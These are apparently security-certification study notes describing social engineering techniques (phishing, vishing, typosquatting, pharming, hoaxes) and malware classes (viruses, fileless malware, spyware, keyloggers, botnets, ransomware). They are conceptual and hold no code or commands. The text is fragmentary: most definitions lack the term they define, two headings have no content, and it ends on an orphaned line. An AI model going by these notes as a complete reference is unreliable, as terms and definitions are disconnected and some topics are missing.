account details from previous attacks are widely available (haveibeenpwned.com). An attacker can try to match a target in one of these databases and hope that they have reused a password. The attacker could also leverage third-party sites for impersonation. For example, rather than using a work account, they could gain control of a social media account.

a threat actor can learn a password or PIN (or other secure information) by watching the user type it. Despite the name, the attacker may not have to be in close proximity to the target—they could use high-powered binoculars or CCTV to directly observe the target remotely.

most authentication methods are dependent on the physical security of the workstation. If a user leaves a workstation unattended while logged on, an attacker can physically gain access to the system. This is often described as a lunchtime attack. Most operating systems are set to activate a password-protected screen saver after a defined period of no keyboard or mouse activity. Users should also be trained to lock or log off the workstation whenever they leave it unattended.

Phishing is a combination of social engineering and spoofing. It persuades or tricks the target into interacting with a malicious resource disguised as a trusted one, traditionally using email as the vector. A phishing message might try to convince the user to perform some action, such as installing disguised malware or allowing a remote access connection by the attacker.

a phishing scam where the attacker has some information that makes an individual target more likely to be fooled by the attack. Each phishing message is tailored to address a specific target user. The attacker might know the name of a document that the target is editing, for instance, and send a malicious copy, or the phishing email might show that the attacker knows the recipient's full name, job title, telephone number, or other details that help convince the target that the communication is genuine.

§  a phishing attack conducted through a voice channel (telephone or VoIP, for instance). For example, targets could be called by someone purporting to represent their bank asking them to verify a recent credit card transaction and requesting their security details. It can be much more difficult for someone to refuse a request made in a phone call compared to one made in an email. 

§  this refers to using short message service (SMS) text communications as the vector.

Unsolicited email, or spam, is used as the vector for many attacks. Threat actors harvest email addresses from marketing lists or databases of historic privacy breaches, or might try to target every email address at a certain company. Mass mail attacks could also be perpetrated over any type of instant messaging or Internet messaging service (SPIM).

Hoaxes, such as security alerts or chain emails, are another common social engineering technique, often combined with phishing attacks. An email alert or web pop-up will claim to have identified some sort of security problem, such as virus infection, and offer a tool to fix the problem. The tool of course will be some sort of Trojan application.

prepending means adding text that appears to have been generated by the mail system. For example, an attacker may add "RE:" to the subject line to make it appear as though the message is a reply or may add something like "MAILSAFE: PASSED" to make it appear as though a message has been scanned and accepted by some security software.

Pharming is a passive means of redirecting users from a legitimate website to a malicious one. Rather than using social engineering techniques to trick the user, pharming relies on corrupting the way the victim's computer performs Internet name resolution, so that they are redirected from the genuine site to the malicious one. For example, if mybank.foo should point to the IP address 2.2.2.2, a pharming attack would corrupt the name resolution process to make it point to IP address 6.6.6.6. 

Typosquatting 

Rather than redirection, a threat actor might use typosquatting. This means that the threat actor registers a domain name that is very similar to a real one, such as connptia.org, hoping that users will not notice the difference. These are also referred to as cousin, lookalike, or doppelganger domains. Typosquatting might be used for pharming and phishing attacks. Another technique is to register a hijacked subdomain using the primary domain of a trusted cloud provider, such as onmicrosoft.com. If a phishing message appears to come from comptia.onmicrosoft.com, many users will be inclined to trust it. 

Watering Hole Attack 

Credential Harvesting 

these represent some of the first types of malware and spread without any authorization from the user by being concealed within the executable code of another process.The earliest types of malware infect executable files on disk (virus) or in memory (worm). This type of malware is primarily designed to replicate, but may drop any type of payload.

the virus is contained within a host executable file and runs with the host process. The virus will try to infect other process images on persistent storage and perform other payload actions. It then passes control back to the host program.

when the host file is executed, the virus creates a new process for itself in memory. The malicious process remains in memory, even if the host process is terminated.

the virus code is written to the disk boot sector or the partition table of a fixed disk or USB media, and executes as a memory resident process when the OS starts or the media is attached to the computer.

the malware uses the programming features available in local scripting engines for the OS and/or browser, such as PowerShell, Windows Management Instrumentation (WMI), JavaScript, Microsoft Office documents with Visual Basic for Applications (VBA) code enabled, or PDF documents with JavaScript enabled.

§  Fileless malware does not write its code to disk. The malware uses memory resident techniques to run in its own process, within a host process or dynamic link library (DLL), or within a scripting host. This does not mean that there is no disk activity at all, however. The malware may change registry values to achieve persistence (executing if the host computer is restarted). The initial execution of the malware may also depend on the user running a downloaded script, file attachment, or Trojan software package.

§  Fileless malware uses lightweight shellcode to achieve a backdoor mechanism on the host. The shellcode is easy to recompile in an obfuscated form to evade detection by scanners. It is then able to download additional packages or payloads to achieve the actor's actions and/or objectives. These packages can also be obfuscated, streamed, and compiled on the fly to evade automated detection.

§  Fileless malware may use "live off the land" techniques rather than compiled executables to evade detection. This means that the malware code uses legitimate system scripting tools, notably PowerShell and Windows Management Instrumentation (WMI), to execute payload actions. If they can be executed with sufficient permissions, these environments provide all the tools the attacker needs to perform scanning, reconfigure settings, and exfiltrate data.

this is a class of PUP/grayware that performs browser reconfigurations, such as allowing tracking cookies, changing default search providers, opening sponsor's pages at startup, adding bookmarks, and so on. Adware may be installed as a program or as a browser extension/plug-in.

§  this is malware that can perform adware-like tracking, but also monitor local application activity, take screenshots, and activate recording devices, such as a microphone or webcam. Another spyware technique is to perform Domain Name Service (DNS) redirection to pharming sites.

§  A keylogger is spyware that actively attempts to steal confidential information by recording keystrokes. The attacker will usually hope to discover passwords or credit card data.

A compromised host can be installed with one or more bots. A bot is an automated script or tool that performs some malicious activity. A group of bots that are all under the control of the same malware instance can be manipulated as a botnet by the herder program. A botnet can be used for many types of malicious purpose, including triggering distributed denial of service (DDoS) attacks, launching spam campaigns, or performing cryptomining.

Ransomware is a type of malware that tries to extort money from the victim. One class of ransomware will display threatening messages, such as requiring Windows to be reactivated or suggesting that the computer has been locked by the police because it was used to view child pornography or for terrorism. This may apparently block access to the file system by installing a different shell program, but this sort of attack is usually relatively simple to fix.

is a suite of tools designed to assist with troubleshooting issues with Windows, and many of the tools are suited to investigating security issues. The Sysinternals tool Process Explorer is an enhanced version of Task Manager. You can view extra information about each process and better understand how processes are created in parent/child relationships.

§  an unencrypted message.